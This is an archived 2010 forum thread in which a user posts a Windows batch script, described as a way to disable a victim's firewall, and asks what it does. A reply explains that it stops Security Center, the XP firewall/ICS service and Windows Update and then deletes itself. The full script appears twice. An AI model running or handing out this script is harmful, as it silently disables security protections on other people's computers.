implague Posted May 2, 2010 Share Posted May 2, 2010 hi,frenz yeastreday on of my frend send me a file and told me this file can remotely shuts the firewall of the victims computer code as follwsnet stop "Security center"net stop SharedAccess> "%Temp%.kill.reg" ECHO REGEDIT4>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsv c]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.START /WAIT REGEDIT /S "%Temp%.kill.reg"del "%Temp%.kill.reg"del %0"make a .bat with this code and run it" so i did this on my vmware machine but nothing happens but the bat file is gone and merged somwhere i guess is in the registry but i like to know where it goes so i posted it here to get more efficiant people opinion so guys plz do help me and let me know what exactly this is sorry for my bad english but plz do help me. Link to comment Share on other sites More sharing options...
HX1 Posted May 2, 2010 Share Posted May 2, 2010 In which environment did you run this in.. yours.. or was it physically in the VM? Link to comment Share on other sites More sharing options...
CODYQX4 Posted May 2, 2010 Share Posted May 2, 2010 hi,frenz yeastreday on of my frend send me a file and told me this file can remotely shuts the firewall of the victims computer code as follwsnet stop "Security center"net stop SharedAccess> "%Temp%.kill.reg" ECHO REGEDIT4>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsv c]>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004>>"%Temp%.kill.reg" ECHO.START /WAIT REGEDIT /S "%Temp%.kill.reg"del "%Temp%.kill.reg"del %0"make a .bat with this code and run it" so i did this on my vmware machine but nothing happens but the bat file is gone and merged somwhere i guess is in the registry but i like to know where it goes so i posted it here to get more efficiant people opinion so guys plz do help me and let me know what exactly this is sorry for my bad english but plz do help me.Well I don't know if this actually is written proper, but it looks like it tries to disable Security center, Internet Connection Sharing, and Windows Update. I don't know if Windows Firewall needs SC running to work. I think you could adjust it to kill the service but you need to get it on the PC (Virus/malware) in the first place.This will only work on XP if it succeeds, as the SharedAccess is ICS/WF and they are separate services in Vista/7. PS: This is why you shouldn't rely on MS crap for security, any decent security solution should prevent crap like this from easily killing this. In Norton, You cannot shut down NIS service through bat or conventional means, though I think you can set it to disable and it be screwed at next boot, assuming NIS doesn't flip out about a bat screwing with its service config, and I don't think it will since I use .bat files like this to quickly disable unnecessary crap but reverse change easy. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.